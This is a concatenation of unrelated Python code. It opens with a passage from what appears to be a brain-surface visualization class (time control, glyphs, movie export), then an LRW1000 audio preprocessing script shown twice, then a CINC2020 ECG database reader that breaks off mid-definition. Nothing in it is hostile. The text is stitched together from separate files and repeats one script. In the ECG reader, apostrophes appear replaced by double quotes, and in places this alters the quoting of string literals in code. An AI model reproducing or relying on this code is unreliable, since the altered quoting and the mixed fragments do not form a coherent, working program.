_cell_data(grid)['values'].fill(fill) # XXX for sided data, we probably actually need two # volumes as composite/MIP needs to look at two # extremes... for now just use abs. Eventually we can add # two volumes if we want. _cell_data(grid)['values'][vertices] = values # interpolate in space smooth_mat = hemi_data.get('smooth_mat') if smooth_mat is not None: act_data = smooth_mat.dot(act_data) # update the mesh scalar values if hemi in self._layered_meshes: mesh = self._layered_meshes[hemi] if 'data' in mesh._overlays: mesh.update_overlay(name='data', scalars=act_data) else: mesh.add_overlay( scalars=act_data, colormap=self._data['ctable'], rng=self._cmap_range, opacity=None, name='data', ) # update the glyphs if vectors is not None: self._update_glyphs(hemi, vectors) self._data['time_idx'] = time_idx self._renderer._update() def set_time(self, time): """Set the time to display (in seconds). Parameters ---------- time : float The time to show, in seconds. """ if self._times is None: raise ValueError( 'Cannot set time when brain has no defined times.') elif min(self._times) <= time <= max(self._times): self.set_time_point(np.interp(float(time), self._times, np.arange(self._n_times))) else: raise ValueError( f'Requested time ({time} s) is outside the range of ' f'available times ({min(self._times)}-{max(self._times)} s).') def _update_glyphs(self, hemi, vectors): hemi_data = self._data.get(hemi) assert hemi_data is not None vertices = hemi_data['vertices'] vector_alpha = self._data['vector_alpha'] scale_factor = self._data['scale_factor'] vertices = slice(None) if vertices is None else vertices x, y, z = np.array(self.geo[hemi].coords)[vertices].T if hemi_data['glyph_actor'] is None: add = True hemi_data['glyph_actor'] = list() else: add = False count = 0 for _ in self._iter_views(hemi): if hemi_data['glyph_dataset'] is None: glyph_mapper, glyph_dataset = self._renderer.quiver3d( x, y, z, vectors[:, 0], vectors[:, 1], vectors[:, 2], color=None, mode='2darrow', scale_mode='vector', scale=scale_factor, opacity=vector_alpha, name=str(hemi) + "_glyph" ) hemi_data['glyph_dataset'] = glyph_dataset hemi_data['glyph_mapper'] = glyph_mapper else: glyph_dataset = hemi_data['glyph_dataset'] _point_data(glyph_dataset)['vec'] = vectors glyph_mapper = hemi_data['glyph_mapper'] if add: glyph_actor = self._renderer._actor(glyph_mapper) prop = glyph_actor.GetProperty() prop.SetLineWidth(2.) prop.SetOpacity(vector_alpha) self._renderer.plotter.add_actor(glyph_actor, render=False) hemi_data['glyph_actor'].append(glyph_actor) else: glyph_actor = hemi_data['glyph_actor'][count] count += 1 self._renderer._set_colormap_range( actor=glyph_actor, ctable=self._data['ctable'], scalar_bar=None, rng=self._cmap_range, ) @property def _cmap_range(self): dt_max = self._data['fmax'] if self._data['center'] is None: dt_min = self._data['fmin'] else: dt_min = -1 * dt_max rng = [dt_min, dt_max] return rng def _update_fscale(self, fscale): """Scale the colorbar points.""" fmin = self._data['fmin'] * fscale fmid = self._data['fmid'] * fscale fmax = self._data['fmax'] * fscale self.update_lut(fmin=fmin, fmid=fmid, fmax=fmax) def _update_auto_scaling(self, restore=False): user_clim = self._data['clim'] if user_clim is not None and 'lims' in user_clim: allow_pos_lims = False else: allow_pos_lims = True if user_clim is not None and restore: clim = user_clim else: clim = 'auto' colormap = self._data['colormap'] transparent = self._data['transparent'] mapdata = _process_clim( clim, colormap, transparent, np.concatenate(list(self._current_act_data.values())), allow_pos_lims) diverging = 'pos_lims' in mapdata['clim'] colormap = mapdata['colormap'] scale_pts = mapdata['clim']['pos_lims' if diverging else 'lims'] transparent = mapdata['transparent'] del mapdata fmin, fmid, fmax = scale_pts center = 0. if diverging else None self._data['center'] = center self._data['colormap'] = colormap self._data['transparent'] = transparent self.update_lut(fmin=fmin, fmid=fmid, fmax=fmax) def _to_time_index(self, value): """Return the interpolated time index of the given time value.""" time = self._data['time'] value = np.interp(value, time, np.arange(len(time))) return value @property def data(self): """Data used by time viewer and color bar widgets.""" return self._data @property def labels(self): return self._labels @property def views(self): return self._views @property def hemis(self): return self._hemis def _save_movie(self, filename, time_dilation=4., tmin=None, tmax=None, framerate=24, interpolation=None, codec=None, bitrate=None, callback=None, time_viewer=False, **kwargs): import imageio with self._renderer._disabled_interaction(): images = self._make_movie_frames( time_dilation, tmin, tmax, framerate, interpolation, callback, time_viewer) # find imageio FFMPEG parameters if 'fps' not in kwargs: kwargs['fps'] = framerate if codec is not None: kwargs['codec'] = codec if bitrate is not None: kwargs['bitrate'] = bitrate imageio.mimwrite(filename, images, **kwargs) def _save_movie_tv(self, filename, time_dilation=4., tmin=None, tmax=None, framerate=24, interpolation=None, codec=None, bitrate=None, callback=None, time_viewer=False, **kwargs): def frame_callback(frame, n_frames): if frame == n_frames: # On the ImageIO step self.status_msg.set_value( "Saving with ImageIO: %s" % filename ) self.status_msg.show() self.status_progress.hide() self._renderer._status_bar_update() else: self.status_msg.set_value( "Rendering images (frame %d / %d) ..." % (frame + 1, n_frames) ) self.status_msg.show() self.status_progress.show() self.status_progress.set_range([0, n_frames - 1]) self.status_progress.set_value(frame) self.status_progress.update() self.status_msg.update() self._renderer._status_bar_update() # set cursor to busy default_cursor = self._renderer._window_get_cursor() self._renderer._window_set_cursor( self._renderer._window_new_cursor("WaitCursor")) try: self._save_movie(filename, time_dilation, tmin, tmax, framerate, interpolation, codec, bitrate, frame_callback, time_viewer, **kwargs) except (Exception, KeyboardInterrupt): warn('Movie saving aborted:\n' + traceback.format_exc()) finally: self._renderer._window_set_cursor(default_cursor) @fill_doc def save_movie(self, filename=None, time_dilation=4., tmin=None, tmax=None, framerate=24, interpolation=None, codec=None, bitrate=None, callback=None, time_viewer=False, **kwargs): """Save a movie (for data with a time axis). The movie is created through the :mod:`imageio` module. The format is determined by the extension, and additional options can be specified through keyword arguments that depend on the format, see :doc:`imageio's format page <imageio:formats/index>`. .. Warning:: This method assumes that time is specified in seconds when adding data. If time is specified in milliseconds this will result in movies 1000 times longer than expected. Parameters ---------- filename : str Path at which to save the movie. The extension determines the format (e.g., ``'*.mov'``, ``'*.gif'``, ...; see the :mod:`imageio` documentation for available formats). time_dilation : float Factor by which to stretch time (default 4). For example, an epoch from -100 to 600 ms lasts 700 ms. With ``time_dilation=4`` this would result in a 2.8 s long movie. tmin : float First time point to include (default: all data). tmax : float Last time point to include (default: all data). framerate : float Framerate of the movie (frames per second, default 24). %(brain_time_interpolation)s If None, it uses the current ``brain.interpolation``, which defaults to ``'nearest'``. Defaults to None. codec : str | None The codec to use. bitrate : float | None The bitrate to use. callback : callable | None A function to call on each iteration. Useful for status message updates. It will be passed keyword arguments ``frame`` and ``n_frames``. %(brain_screenshot_time_viewer)s **kwargs : dict Specify additional options for :mod:`imageio`. """ if filename is None: filename = _generate_default_filename(".mp4") func = self._save_movie_tv if self.time_viewer else self._save_movie func(filename, time_dilation, tmin, tmax, framerate, interpolation, codec, bitrate, callback, time_viewer, **kwargs) def _make_movie_frames(self, time_dilation, tmin, tmax, framerate, interpolation, callback, time_viewer): from math import floor # find tmin if tmin is None: tmin = self._times[0] elif tmin < self._times[0]: raise ValueError("tmin=%r is smaller than the first time point " "(%r)" % (tmin, self._times[0])) # find indexes at which to create frames if tmax is None: tmax = self._times[-1] elif tmax > self._times[-1]: raise ValueError("tmax=%r is greater than the latest time point " "(%r)" % (tmax, self._times[-1])) n_frames = floor((tmax - tmin) * time_dilation * framerate) times = np.arange(n_frames, dtype=float) times /= framerate * time_dilation times += tmin time_idx = np.interp(times, self._times, np.arange(self._n_times)) n_times = len(time_idx) if n_times == 0: raise ValueError("No time points selected") logger.debug("Save movie for time points/samples\n%s\n%s" % (times, time_idx)) # Sometimes the first screenshot is rendered with a different # resolution on OS X self.screenshot(time_viewer=time_viewer) old_mode = self.time_interpolation if interpolation is not None: self.set_time_interpolation(interpolation) try: images = [ self.screenshot(time_viewer=time_viewer) for _ in self._iter_time(time_idx, callback)] finally: self.set_time_interpolation(old_mode) if callback is not None: callback(frame=len(time_idx), n_frames=len(time_idx)) return images def _iter_time(self, time_idx, callback): """Iterate through time points, then reset to current time. Parameters ---------- time_idx : array_like Time point indexes through which to iterate. callback : callable | None Callback to call before yielding each frame. Yields ------ idx : int | float Current index. Notes ----- Used by movie and image sequence saving functions. """ if self.time_viewer: func = partial(self.callbacks["time"], update_widget=True) else: func = self.set_time_point current_time_idx = self._data["time_idx"] for ii, idx in enumerate(time_idx): func(idx) if callback is not None: callback(frame=ii, n_frames=len(time_idx)) yield idx # Restore original time index func(current_time_idx) def _check_stc(self, hemi, array, vertices): from ...source_estimate import ( _BaseSourceEstimate, _BaseSurfaceSourceEstimate, _BaseMixedSourceEstimate, _BaseVolSourceEstimate ) if isinstance(array, _BaseSourceEstimate): stc = array stc_surf = stc_vol = None if isinstance(stc, _BaseSurfaceSourceEstimate): stc_surf = stc elif isinstance(stc, _BaseMixedSourceEstimate): stc_surf = stc.surface() if hemi != 'vol' else None stc_vol = stc.volume() if hemi == 'vol' else None elif isinstance(stc, _BaseVolSourceEstimate): stc_vol = stc if hemi == 'vol' else None else: raise TypeError("stc not supported") if stc_surf is None and stc_vol is None: raise ValueError("No data to be added") if stc_surf is not None: array = getattr(stc_surf, hemi + '_data') vertices = stc_surf.vertices[0 if hemi == 'lh' else 1] if stc_vol is not None: array = stc_vol.data vertices = np.concatenate(stc_vol.vertices) else: stc = None return stc, array, vertices def _check_hemi(self, hemi, extras=()): """Check for safe single-hemi input, returns str.""" _validate_type(hemi, (None, str), 'hemi') if hemi is None: if self._hemi not in ['lh', 'rh']: raise ValueError('hemi must not be None when both ' 'hemispheres are displayed') hemi = self._hemi _check_option('hemi', hemi, ('lh', 'rh') + tuple(extras)) return hemi def _check_hemis(self, hemi): """Check for safe dual or single-hemi input, returns list.""" if hemi is None: if self._hemi not in ['lh', 'rh']: hemi = ['lh', 'rh'] else: hemi = [self._hemi] elif hemi not in ['lh', 'rh']: extra = ' or None' if self._hemi in ['lh', 'rh'] else '' raise ValueError('hemi must be either "lh" or "rh"' + extra) else: hemi = [hemi] return hemi def _to_borders(self, label, hemi, borders, restrict_idx=None): """Convert a label/parc to borders.""" if not isinstance(borders, (bool, int)) or borders < 0: raise ValueError('borders must be a bool or positive integer') if borders: n_vertices = label.size edges = mesh_edges(self.geo[hemi].orig_faces) edges = edges.tocoo() border_edges = label[edges.row] != label[edges.col] show = np.zeros(n_vertices, dtype=np.int64) keep_idx = np.unique(edges.row[border_edges]) if isinstance(borders, int): for _ in range(borders): keep_idx = np.in1d( self.geo[hemi].orig_faces.ravel(), keep_idx) keep_idx.shape = self.geo[hemi].orig_faces.shape keep_idx = self.geo[hemi].orig_faces[ np.any(keep_idx, axis=1)] keep_idx = np.unique(keep_idx) if restrict_idx is not None: keep_idx = keep_idx[np.in1d(keep_idx, restrict_idx)] show[keep_idx] = 1 label *= show @deprecated('enable_depth_peeling is deprecated and will be ' 'removed in 1.1') def enable_depth_peeling(self): """Enable depth peeling. """ self._renderer._enable_depth_peeling() def get_picked_points(self): """Return the vertices of the picked points. Returns ------- points : list of int | None The vertices picked by the time viewer. """ if hasattr(self, "time_viewer"): return self.picked_points def __hash__(self): """Hash the object.""" raise NotImplementedError def _safe_interp1d(x, y, kind='linear', axis=-1, assume_sorted=False): """Work around interp1d not liking singleton dimensions.""" from scipy.interpolate import interp1d if y.shape[axis] == 1: def func(x): return np.take(y, np.zeros(np.asarray(x).shape, int), axis=axis) return func else: return interp1d(x, y, kind, axis=axis, assume_sorted=assume_sorted) def _update_limits(fmin, fmid, fmax, center, array): if center is None: if fmin is None: fmin = array.min() if array.size > 0 else 0 if fmax is None: fmax = array.max() if array.size > 0 else 1 else: if fmin is None: fmin = 0 if fmax is None: fmax = np.abs(center - array).max() if array.size > 0 else 1 if fmid is None: fmid = (fmin + fmax) / 2. if fmin >= fmid: raise RuntimeError('min must be < mid, got %0.4g >= %0.4g' % (fmin, fmid)) if fmid >= fmax: raise RuntimeError('mid must be < max, got %0.4g >= %0.4g' % (fmid, fmax)) return fmin, fmid, fmax def _update_monotonic(lims, fmin, fmid, fmax): if fmin is not None: lims['fmin'] = fmin if lims['fmax'] < fmin: logger.debug(f' Bumping fmax = {lims["fmax"]} to {fmin}') lims['fmax'] = fmin if lims['fmid'] < fmin: logger.debug(f' Bumping fmid = {lims["fmid"]} to {fmin}') lims['fmid'] = fmin assert lims['fmin'] <= lims['fmid'] <= lims['fmax'] if fmid is not None: lims['fmid'] = fmid if lims['fmin'] > fmid: logger.debug(f' Bumping fmin = {lims["fmin"]} to {fmid}') lims['fmin'] = fmid if lims['fmax'] < fmid: logger.debug(f' Bumping fmax = {lims["fmax"]} to {fmid}') lims['fmax'] = fmid assert lims['fmin'] <= lims['fmid'] <= lims['fmax'] if fmax is not None: lims['fmax'] = fmax if lims['fmin'] > fmax: logger.debug(f' Bumping fmin = {lims["fmin"]} to {fmax}') lims['fmin'] = fmax if lims['fmid'] > fmax: logger.debug(f' Bumping fmid = {lims["fmid"]} to {fmax}') lims['fmid'] = fmax assert lims['fmin'] <= lims['fmid'] <= lims['fmax'] def _get_range(brain): val = np.abs(np.concatenate(list(brain._current_act_data.values()))) return [np.min(val), np.max(val)] class _FakeIren(): def EnterEvent(self): pass def MouseMoveEvent(self): pass def LeaveEvent(self): pass def SetEventInformation(self, *args, **kwargs): pass def CharEvent(self): pass def KeyPressEvent(self, *args, **kwargs): pass def KeyReleaseEvent(self, *args, **kwargs): pass
###################################### ## 数据文件夹下LRW文件夹的名字. ## ###################################### LRW1000_DATA_PATH_NAME = '/data/zhangyk/data/CAS-VSR-W1k/audio/LRW1000_Public/audio' LRW1000_AUDIO_DATA_PATH_NAME = '/data/zhangyk/data/lrw1000_audio_pkl' ###################################### import torch from torch.utils.data import Dataset, DataLoader import numpy as np import glob import time import os import os.path as osp import sys sys.path.append("../") from models.metrics import ROOT_PATH from models.utils import mkdir, save_pickle, parse_dataloader_split_csv, nan_assert from tqdm.contrib import tzip import librosa import warnings warnings.filterwarnings('ignore') import torchaudio data_root_path = osp.join('/data/zhangyk/data', LRW1000_AUDIO_DATA_PATH_NAME) source_l, target_l = [], [] for stype in ['train', 'val', 'test', 'aux_val', 'aux_test']: csv_path = osp.join(ROOT_PATH, f'data/lrw1000/split/{stype}.csv') with open(csv_path, 'r') as f: csv_tmp = f.readlines() target_l.extend([osp.join(data_root_path, i.strip().split(',')[0]) for i in csv_tmp[1:]]) for i in csv_tmp[1:]: i_split = i.strip().split(',')[0] source_l.append(f'{i_split[i_split.rfind('_') + 1 : i_split.find('.pkl')]}.wav') seq_len = 26880 for i, j in tzip(source_l, target_l): waveform, sample_rate = torchaudio.load(osp.join(LRW1000_DATA_PATH_NAME, i)) assert sample_rate == 16000 waveform = waveform.squeeze(0) if waveform.shape[0] > seq_len: beg = int((waveform.shape[0] - seq_len) / 2) waveform = waveform[beg : beg + seq_len] elif waveform.shape[0] < seq_len: waveform = torch.cat([waveform, torch.zeros(seq_len - waveform.shape[0])]) assert waveform.shape[0] == seq_len waveform = waveform.cpu().detach().numpy() save_pickle(j, waveform)
###################################### ## 数据文件夹下LRW文件夹的名字. ## ###################################### LRW1000_DATA_PATH_NAME = '/data/zhangyk/data/CAS-VSR-W1k/audio/LRW1000_Public/audio' LRW1000_AUDIO_DATA_PATH_NAME = '/data/zhangyk/data/lrw1000_audio_pkl' ###################################### import torch from torch.utils.data import Dataset, DataLoader import numpy as np import glob import time import os import os.path as osp import sys sys.path.append("../") from models.metrics import ROOT_PATH from models.utils import mkdir, save_pickle, parse_dataloader_split_csv, nan_assert from tqdm.contrib import tzip import librosa import warnings warnings.filterwarnings('ignore') import torchaudio data_root_path = osp.join('/data/zhangyk/data', LRW1000_AUDIO_DATA_PATH_NAME) source_l, target_l = [], [] for stype in ['train', 'val', 'test', 'aux_val', 'aux_test']: csv_path = osp.join(ROOT_PATH, f'data/lrw1000/split/{stype}.csv') with open(csv_path, 'r') as f: csv_tmp = f.readlines() target_l.extend([osp.join(data_root_path, i.strip().split(',')[0]) for i in csv_tmp[1:]]) for i in csv_tmp[1:]: i_split = i.strip().split(',')[0] source_l.append(f'{i_split[i_split.rfind("_") + 1 : i_split.find(".pkl")]}.wav') seq_len = 26880 for i, j in tzip(source_l, target_l): waveform, sample_rate = torchaudio.load(osp.join(LRW1000_DATA_PATH_NAME, i)) assert sample_rate == 16000 waveform = waveform.squeeze(0) if waveform.shape[0] > seq_len: beg = int((waveform.shape[0] - seq_len) / 2) waveform = waveform[beg : beg + seq_len] elif waveform.shape[0] < seq_len: waveform = torch.cat([waveform, torch.zeros(seq_len - waveform.shape[0])]) assert waveform.shape[0] == seq_len waveform = waveform.cpu().detach().numpy() save_pickle(j, waveform)
# -*- coding: utf-8 -*- """ """ import os, io, sys import re import json import time # import pprint from copy import deepcopy from datetime import datetime from typing import Union, Optional, Any, List, Dict, Tuple, Set, Sequence, NoReturn from numbers import Real, Number import numpy as np np.set_printoptions(precision=5, suppress=True) import pandas as pd import wfdb from scipy.io import loadmat from scipy.signal import resample, resample_poly from ...cfg import CFG from ...utils.misc import ( get_record_list_recursive, get_record_list_recursive3, ms2samples, dict_to_str, ensure_siglen, ) from ...utils import ecg_arrhythmia_knowledge as EAK from ..aux_data.cinc2020_aux_data import ( dx_mapping_all, dx_mapping_scored, dx_mapping_unscored, normalize_class, abbr_to_snomed_ct_code, df_weights_abbr, equiv_class_dict, ) from ..base import PhysioNetDataBase, DEFAULT_FIG_SIZE_PER_SEC __all__ = [ "CINC2020", "compute_metrics", "compute_all_metrics", ] # configurations for visualization PlotCfg = CFG() # default const for the plot function in dataset.py # used only when corr. values are absent # all values are time bias w.r.t. corr. peaks, with units in ms PlotCfg.p_onset = -40 PlotCfg.p_offset = 40 PlotCfg.q_onset = -20 PlotCfg.s_offset = 40 PlotCfg.qrs_radius = 60 PlotCfg.t_onset = -100 PlotCfg.t_offset = 60 class CINC2020(PhysioNetDataBase): """ finished, under improving, Classification of 12-lead ECGs: the PhysioNet/Computing in Cardiology Challenge 2020 ABOUT CINC2020 -------------- 0. There are 6 difference tranches of training data, listed as follows: A. 6,877 recordings from China Physiological Signal Challenge in 2018 (CPSC2018): PhysioNetChallenge2020_Training_CPSC.tar.gz in ref. [6] B. 3,453 recordings from China 12-Lead ECG Challenge Database (unused data from CPSC2018 and NOT the CPSC2018 test data): PhysioNetChallenge2020_Training_2.tar.gz in ref. [6] C. 74 recordings from the St Petersburg INCART 12-lead Arrhythmia Database: PhysioNetChallenge2020_Training_StPetersburg.tar.gz in ref. [6] D. 516 recordings from the PTB Diagnostic ECG Database: PhysioNetChallenge2020_Training_PTB.tar.gz in ref. [6] E. 21,837 recordings from the PTB-XL electrocardiography Database: PhysioNetChallenge2020_PTB-XL.tar.gz in ref. [6] F. 10,344 recordings from a Georgia 12-Lead ECG Challenge Database: PhysioNetChallenge2020_Training_E.tar.gz in ref. [6] In total, 43,101 labeled recordings of 12-lead ECGs from four countries (China, Germany, Russia, and the USA) across 3 continents have been posted publicly for this Challenge, with approximately the same number hidden for testing, representing the largest public collection of 12-lead ECGs 1. the A tranche training data comes from CPSC2018, whose folder name is `Training_WFDB`. The B tranche training data are unused training data of CPSC2018, having folder name `Training_2`. For these 2 tranches, ref. the docstring of `database_reader.cpsc_databases.cpsc2018.CPSC2018` 2. C. D. E. tranches of training data all come from corresponding PhysioNet dataset, whose details can be found in corresponding files: C: database_reader.physionet_databases.incartdb.INCARTDB D: database_reader.physionet_databases.ptbdb.PTBDB E: database_reader.physionet_databases.ptb_xl.PTB_XL the C tranche has folder name `Training_StPetersburg`, the D tranche has folder name `Training_PTB`, the F tranche has folder name `WFDB` 3. the F tranche is entirely new, posted for this Challenge, and represents a unique demographic of the Southeastern United States. It has folder name `Training_E/WFDB`. 4. only a part of diagnosis_abbr (diseases that appear in the labels of the 6 tranches of training data) are used in the scoring function (ref. `dx_mapping_scored_cinc2020`), while others are ignored (ref. `dx_mapping_unscored_cinc2020`). The scored diagnoses were chosen based on prevalence of the diagnoses in the training data, the severity of the diagnoses, and the ability to determine the diagnoses from ECG recordings. The ignored diagnosis_abbr can be put in a a "non-class" group. 5. the (updated) scoring function has a scoring matrix with nonzero off-diagonal elements. This scoring function reflects the clinical reality that some misdiagnoses are more harmful than others and should be scored accordingly. Moreover, it reflects the fact that confusing some classes is much less harmful than confusing other classes. 6. sampling frequencies: A. (CPSC2018): 500 Hz B. (CPSC2018-2): 500 Hz C. (INCART): 257 Hz D. (PTB): 1000 Hz E. (PTB-XL): 500 Hz F. (Georgia): 500 Hz 7. all data are recorded in the leads ordering of ["I", "II", "III", "aVR", "aVL", "aVF", "V1", "V2", "V3", "V4", "V5", "V6"] using for example the following code: >>> db_dir = "/media/cfs/wenhao71/data/cinc2020_data/" >>> working_dir = "./working_dir" >>> dr = CINC2020Reader(db_dir=db_dir,working_dir=working_dir) >>> set_leads = [] >>> for tranche, l_rec in dr.all_records.items(): ... for rec in l_rec: ... ann = dr.load_ann(rec) ... leads = ann["df_leads"]["lead_name"].values.tolist() ... if leads not in set_leads: ... set_leads.append(leads) NOTE ---- 1. The datasets have been roughly processed to have a uniform format, hence differ from their original resource (e.g. differe in sampling frequency, sample duration, etc.) 2. The original datasets might have richer metadata (especially those from PhysioNet), which can be fetched from corresponding reader's docstring or website of the original source 3. Each sub-dataset might have its own organizing scheme of data, which should be carefully dealt with 4. There are few "absolute" diagnoses in 12 lead ECGs, where large discrepancies in the interpretation of the ECG can be found even inspected by experts. There is inevitably something lost in translation, especially when you do not have the context. This doesn"t mean making an algorithm isn't important 5. The labels are noisy, which one has to deal with in all real world data 6. each line of the following classes are considered the same (in the scoring matrix): - RBBB, CRBBB (NOT including IRBBB) - PAC, SVPB - PVC, VPB 7. unfortunately, the newly added tranches (C - F) have baseline drift and are much noisier. In contrast, CPSC data have had baseline removed and have higher SNR 8. on Aug. 1, 2020, adc gain (including "resolution", "ADC"? in .hea files) of datasets INCART, PTB, and PTB-xl (tranches C, D, E) are corrected. After correction, (the .tar files of) the 3 datasets are all put in a "WFDB" subfolder. In order to keep the structures consistant, they are moved into "Training_StPetersburg", "Training_PTB", "WFDB" as previously. Using the following code, one can check the adc_gain and baselines of each tranche: >>> db_dir = "/media/cfs/wenhao71/data/cinc2020_data/" >>> working_dir = "./working_dir" >>> dr = CINC2020(db_dir=db_dir,working_dir=working_dir) >>> resolution = {tranche: set() for tranche in "ABCDEF"} >>> baseline = {tranche: set() for tranche in "ABCDEF"} >>> for tranche, l_rec in dr.all_records.items(): ... for rec in l_rec: ... ann = dr.load_ann(rec) ... resolution[tranche] = resolution[tranche].union(set(ann["df_leads"]["adc_gain"])) ... baseline[tranche] = baseline[tranche].union(set(ann["df_leads"]["baseline"])) >>> print(resolution, baseline) {"A": {1000.0}, "B": {1000.0}, "C": {1000.0}, "D": {1000.0}, "E": {1000.0}, "F": {1000.0}} {"A": {0}, "B": {0}, "C": {0}, "D": {0}, "E": {0}, "F": {0}} 9. the .mat files all contain digital signals, which has to be converted to physical values using adc gain, basesline, etc. in corresponding .hea files. `wfdb.rdrecord` has already done this conversion, hence greatly simplifies the data loading process. NOTE that there"s a difference when using `wfdb.rdrecord`: data from `loadmat` are in "channel_first" format, while `wfdb.rdrecord.p_signal` produces data in the "channel_last" format 10. there"re 3 equivalent (2 classes are equivalent if the corr. value in the scoring matrix is 1): (RBBB, CRBBB), (PAC, SVPB), (PVC, VPB) 11. in the newly (Feb., 2021) created dataset (ref. [7]), header files of each subset were gathered into one separate compressed file. This is due to the fact that updates on the dataset are almost always done in the header files. The correct usage of ref. [7], after uncompressing, is replacing the header files in the folder `All_training_WFDB` by header files from the 6 folders containing all header files from the 6 subsets. ISSUES ------ 1. reading the .hea files, baselines of all records are 0, however it is not the case if one plot the signal 2. about half of the LAD records satisfy the "2-lead" criteria, but fail for the "3-lead" criteria, which means that their axis is (-30°, 0°) which is not truely LAD 3. (Aug. 15, 2020; resolved, and changed to 1000) tranche F, the Georgia subset, has ADC gain 4880 which might be too high. Thus obtained voltages are too low. 1000 might be a suitable (correct) value of ADC gain for this tranche just as the other tranches. 4. "E04603" (all leads), "E06072" (chest leads, epecially V1-V3), "E06909" (lead V2), "E07675" (lead V3), "E07941" (lead V6), "E08321" (lead V6) has exceptionally large values at rpeaks, reading (`load_data`) these two records using `wfdb` would bring in `nan` values. One can check using the following code >>> rec = "E04603" >>> dr.plot(rec, dr.load_data(rec, backend="scipy", units="uv")) # currently raising error Usage ----- 1. ECG arrhythmia detection References ---------- [1] https://physionetchallenges.github.io/2020/ [2] http://2018.icbeb.org/# [3] https://physionet.org/content/incartdb/1.0.0/ [4] https://physionet.org/content/ptbdb/1.0.0/ [5] https://physionet.org/content/ptb-xl/1.0.1/ [6] (deprecated) https://storage.cloud.google.com/physionet-challenge-2020-12-lead-ecg-public/ [7] (recommended) https://storage.cloud.google.com/physionetchallenge2021-public-datasets/ """ def __init__(self, db_dir:str, working_dir:Optional[str]=None, verbose:int=2, **kwargs:Any) -> NoReturn: """ Parameters ---------- db_dir: str, storage path of the database working_dir: str, optional, working directory, to store intermediate files and log file verbose: int, default 2, log verbosity kwargs: auxilliary key word arguments """ super().__init__(db_name="CINC2020", db_dir=db_dir, working_dir=working_dir, verbose=verbose, **kwargs) self.rec_ext = "mat" self.ann_ext = "hea" self.db_tranches = list("ABCDEF") self.tranche_names = CFG({ "A": "CPSC", "B": "CPSC-Extra", "C": "StPetersburg", "D": "PTB", "E": "PTB-XL", "F": "Georgia", }) self.rec_prefix = CFG({ "A": "A", "B": "Q", "C": "I", "D": "S", "E": "HR", "F": "E", }) self.db_dir_base = db_dir self.db_dirs = CFG({tranche:"" for tranche in self.db_tranches}) self._all_records = None self._ls_rec() # loads file system structures into self.db_dirs and self._all_records self._diagnoses_records_list = None self._ls_diagnoses_records() self.fs = { "A": 500, "B": 500, "C": 257, "D": 1000, "E": 500, "F": 500, } self.spacing = {t: 1000 / f for t,f in self.fs.items()} self.all_leads = deepcopy(EAK.Standard12Leads) self._all_leads_set = set(self.all_leads) self.df_ecg_arrhythmia = dx_mapping_all[["Dx","SNOMED CT Code","Abbreviation"]] self.ann_items = [ "rec_name", "nb_leads","fs","nb_samples","datetime","age","sex", "diagnosis","df_leads", "medical_prescription","history","symptom_or_surgery", ] self.label_trans_dict = equiv_class_dict.copy() # self.value_correction_factor = CFG({tranche:1 for tranche in self.db_tranches}) # self.value_correction_factor.F = 4.88 # ref. ISSUES 3 self.exceptional_records = ["E04603", "E06072", "E06909", "E07675", "E07941", "E08321"] # ref. ISSUES 4 def get_subject_id(self, rec:str) -> int: """ finished, checked, Parameters ---------- rec: str, name of the record Returns ------- sid: int, the `subject_id` corr. to `rec` """ s2d = {"A":"11", "B":"12", "C":"21", "D":"31", "E":"32", "F":"41"} s2d = {self.rec_prefix[k]:v for k,v in s2d.items()} prefix = "".join(re.findall(r"[A-Z]", rec)) n = rec.replace(prefix,"") sid = int(f"{s2d[prefix]}{"0"*(8-len(n))}{n}") return sid def _ls_rec(self) -> NoReturn: """ finished, checked, list all the records and load into `self._all_records`, facilitating further uses """ fn = "record_list.json" record_list_fp = os.path.join(self.db_dir_base, fn) if os.path.isfile(record_list_fp): with open(record_list_fp, "r") as f: self._all_records = {k:v for k,v in json.load(f).items() if k in self.tranche_names} for tranche in self.db_tranches: self.db_dirs[tranche] = os.path.join(self.db_dir_base, os.path.dirname(self._all_records[tranche][0])) self._all_records[tranche] = [os.path.basename(f) for f in self._all_records[tranche]] else: print("Please wait patiently to let the reader find all records of all the tranches...") start = time.time() rec_patterns_with_ext = { tranche: f"^{self.rec_prefix[tranche]}(?:\d+).{self.rec_ext}$" \ for tranche in self.db_tranches } self._all_records = \ get_record_list_recursive3(self.db_dir_base, rec_patterns_with_ext) to_save = deepcopy(self._all_records) for tranche in self.db_tranches: tmp_dirname = [ os.path.dirname(f) for f in self._all_records[tranche] ] if len(set(tmp_dirname)) != 1: if len(set(tmp_dirname)) > 1: raise ValueError(f"records of tranche {tranche} are stored in several folders!") else: raise ValueError(f"no record found for tranche {tranche}!") self.db_dirs[tranche] = os.path.join(self.db_dir_base, tmp_dirname[0]) self._all_records[tranche] = [os.path.basename(f) for f in self._all_records[tranche]] print(f"Done in {time.time() - start:.5f} seconds!") with open(os.path.join(self.db_dir_base, fn), "w") as f: json.dump(to_save, f) def _ls_diagnoses_records(self) -> NoReturn: """ finished, checked, list all the records for all diagnoses """ fn = "diagnoses_records_list.json" dr_fp = os.path.join(self.db_dir_base, fn) if os.path.isfile(dr_fp): with open(dr_fp, "r") as f: self._diagnoses_records_list = json.load(f) else: print("Please wait several minutes patiently to let the reader list records for each diagnosis...") start = time.time() self._diagnoses_records_list = {d: [] for d in df_weights_abbr.columns.values.tolist()} for tranche, l_rec in self._all_records.items(): for rec in l_rec: ann = self.load_ann(rec) ld = ann["diagnosis_scored"]["diagnosis_abbr"] for d in ld: self._diagnoses_records_list[d].append(rec) print(f"Done in {time.time() - start:.5f} seconds!") with open(dr_fp, "w") as f: json.dump(self._diagnoses_records_list, f) self._all_records = CFG(self._all_records) @property def diagnoses_records_list(self): """ finished, checked, """ if self._diagnoses_records_list is None: self._ls_diagnoses_records() return self._diagnoses_records_list def _get_tranche(self, rec:str) -> str: """ finished, checked, get the tranche"s symbol (one of "A","B","C","D","E","F") of a record via its name Parameters ---------- rec: str, name of the record Returns ------- tranche, str, symbol of the tranche, ref. `self.rec_prefix` """ prefix = "".join(re.findall(r"[A-Z]", rec)) tranche = {v:k for k,v in self.rec_prefix.items()}[prefix] return tranche def get_data_filepath(self, rec:str, with_ext:bool=True) -> str: """ finished, checked, get the absolute file path of the data file of `rec` Parameters ---------- rec: str, name of the record with_ext: bool, default True, if True, the returned file path comes with file extension, otherwise without file extension, which is useful for `wfdb` functions Returns ------- fp: str, absolute file path of the data file of the record """ tranche = self._get_tranche(rec) fp = os.path.join(self.db_dirs[tranche], f"{rec}.{self.rec_ext}") if not with_ext: fp = os.path.splitext(fp)[0] return fp def get_header_filepath(self, 